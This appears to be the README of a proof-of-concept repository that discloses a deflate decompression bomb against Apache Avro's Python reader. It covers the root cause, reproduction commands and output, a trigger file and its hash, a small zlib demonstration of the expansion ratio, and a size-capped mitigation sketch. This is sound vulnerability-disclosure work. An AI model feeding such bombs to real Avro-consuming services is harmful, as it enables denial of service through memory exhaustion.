Apache Avro Python deflate decompression bomb PoC

This repository contains a minimal proof of concept for a resource-exhaustion issue in Apache Avro's official Python reader.

Affected:

  • avro==1.12.1 from PyPI
  • Apache Avro main at commit 840dc8139f4b3d1bfa8e8c8f1ac3be949b440634

Root cause:

  • avro.datafile.DataFileReader.__next__() calls _read_block_header().
  • _read_block_header() calls codec.decompress(self.raw_decoder).
  • avro.codecs.DeflateCodec.decompress() reads the compressed Avro block and calls zlib.decompress(data, -15) without any maximum decompressed-size or expansion-ratio limit.
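
For contrast with the unbounded call above, here is a minimal sketch of a size-capped raw-deflate decompression using only the standard zlib module. It is not the Avro project's fix. The names bounded_raw_inflate and DecompressionLimitExceeded and the 64 MiB default are assumptions made for illustration.

```python
import zlib

# Hypothetical cap chosen for illustration; Avro's Python reader defines no such constant.
MAX_DECOMPRESSED_BYTES = 64 * 1024 * 1024


class DecompressionLimitExceeded(ValueError):
    """Raised when a block would inflate past the configured cap."""


def bounded_raw_inflate(data: bytes, limit: int = MAX_DECOMPRESSED_BYTES) -> bytes:
    """Inflate a raw deflate stream, producing at most `limit` bytes."""
    # wbits=-15 selects the same headerless deflate mode as zlib.decompress(data, -15).
    inflater = zlib.decompressobj(wbits=-15)
    # Request at most limit + 1 bytes so that an over-limit stream is detectable
    # without ever allocating the full expanded payload.
    out = inflater.decompress(data, limit + 1)
    if len(out) > limit:
        raise DecompressionLimitExceeded(f"block inflates past {limit} bytes")
    if not inflater.eof:
        # Mirror zlib.decompress(), which rejects truncated streams.
        raise zlib.error("incomplete or truncated deflate stream")
    return out
```

Because max_length bounds the output buffer, the cost of rejecting an oversized block is proportional to the limit rather than to the attacker-chosen expanded size.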

The included avro-deflate-128m.avro is a valid deflate-coded Avro object container file. It is 130,634 bytes on disk and expands to a 134,217,728-byte (128 MiB) bytes field during normal DataFileReader iteration, an expansion of roughly 1,027:1.
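
The expansion ratio can be reproduced at small scale with zlib alone. The sketch below assumes a payload of zero bytes, which may differ from what make_avro_deflate_bomb_poc.py actually generates, and uses 1 MiB instead of 128 MiB to stay quick.

```python
import zlib


def raw_deflate(payload: bytes) -> bytes:
    """Compress with headerless deflate, the framing the Avro deflate codec reads."""
    compressor = zlib.compressobj(level=9, wbits=-15)
    return compressor.compress(payload) + compressor.flush()


# Assumed stand-in payload: 1 MiB of zero bytes.
payload = bytes(1024 * 1024)
compressed = raw_deflate(payload)
ratio = len(payload) / len(compressed)
print(f"{len(payload)} bytes -> {len(compressed)} bytes (about {ratio:.0f}:1)")
```

Highly repetitive input is the best case for deflate, so a small compressed block can stand for a payload several orders of magnitude larger.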

Reproduction

python3 -m venv .venv
.venv/bin/pip install avro==1.12.1
.venv/bin/python verify_avro_deflate_bomb_poc.py \
  avro-deflate-control.avro \
  avro-deflate-128m.avro

Expected result on the test host:

control file_size=181 -> loaded, payload_len=1024, maxrss_after_kb around 18,000
bomb file_size=130634 -> loaded, payload_len=134217728, maxrss_after_kb around 280,000
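
The maxrss_after_kb figures are peak resident set sizes. The verifier's own measurement code is not reproduced here. One common way to obtain such a number, assuming a Unix host, is the standard resource module, as in this sketch (peak_rss_kb is a hypothetical helper name).

```python
import resource
import sys


def peak_rss_kb() -> int:
    """Return this process's peak resident set size in kilobytes."""
    peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
    # Linux reports ru_maxrss in kilobytes; macOS reports it in bytes.
    return peak // 1024 if sys.platform == "darwin" else peak


before_kb = peak_rss_kb()
# Allocate and fill 32 MiB so the pages are actually written.
buffer = b"\x01" * (32 * 1024 * 1024)
after_kb = peak_rss_kb()
print(f"maxrss_before_kb={before_kb} maxrss_after_kb={after_kb}")
```

ru_maxrss is a high-water mark, so it never decreases after the large buffer is released.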

With a 160 MiB address-space cap, the control loads while the bomb fails in the Avro block decompression path:

.venv/bin/python verify_avro_deflate_bomb_poc.py --limit-mb 160 \
  avro-deflate-control.avro \
  avro-deflate-128m.avro

Observed exception:

MemoryError: Unable to allocate output buffer.
  File ".../avro/datafile.py", line 404, in __next__
  File ".../avro/datafile.py", line 386, in _read_block_header
  File ".../avro/codecs.py", line 126, in decompress
    uncompressed = zlib.decompress(data, -15)
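
How --limit-mb is implemented is not shown in this README. A plausible mechanism on Linux, given here only as an assumption, is lowering the soft RLIMIT_AS limit before reading the file, so that an oversized allocation raises MemoryError instead of exhausting the host. cap_address_space is a hypothetical helper name.

```python
import resource


def cap_address_space(limit_mb: int) -> int:
    """Set the soft address-space limit and return the value applied, in bytes."""
    limit_bytes = limit_mb * 1024 * 1024
    _soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    # The soft limit may not exceed a finite hard limit.
    if hard != resource.RLIM_INFINITY:
        limit_bytes = min(limit_bytes, hard)
    resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, hard))
    return limit_bytes
```

Calling cap_address_space(160) before iterating a DataFileReader would correspond to the 160 MiB cap used in the run above, under the stated assumption.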

Files

  • avro-deflate-128m.avro - 130,634-byte trigger file, SHA256 a050bf7715a45d46f0abe327b94557e7d5f209cbdb549292de9e3fe5104df8f0
  • avro-deflate-control.avro - 181-byte control file, SHA256 fd1d3d5cc0722727329d536ee8ab20e4fc3da2629c8921ffde850e96056d7ae9
  • make_avro_deflate_bomb_poc.py - generator
  • verify_avro_deflate_bomb_poc.py - verifier
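
Before running the verifier, the two sample files can be checked against the digests listed above. This is a minimal sketch using hashlib. The helper names sha256_of and verify are illustrative and not part of the repository.

```python
import hashlib
from pathlib import Path

# Digests copied from the file list above.
EXPECTED_SHA256 = {
    "avro-deflate-128m.avro": "a050bf7715a45d46f0abe327b94557e7d5f209cbdb549292de9e3fe5104df8f0",
    "avro-deflate-control.avro": "fd1d3d5cc0722727329d536ee8ab20e4fc3da2629c8921ffde850e96056d7ae9",
}


def sha256_of(path: Path) -> str:
    """Hash a file in 64 KiB chunks so large files are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify(directory: Path = Path(".")) -> dict[str, bool]:
    """Map each expected file name to True if it exists and its digest matches."""
    return {
        name: (directory / name).is_file() and sha256_of(directory / name) == expected
        for name, expected in EXPECTED_SHA256.items()
    }


if __name__ == "__main__":
    for name, ok in verify().items():
        print(f"{name}: {'OK' if ok else 'MISSING OR MISMATCH'}")
```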

Notes

Apache Avro Java recently added decompression-size limits for the same class of codec bomb in AVRO-4247. This PoC demonstrates that the official Python Avro reader still lacks an equivalent limit in the latest PyPI release and in current Apache Avro main.
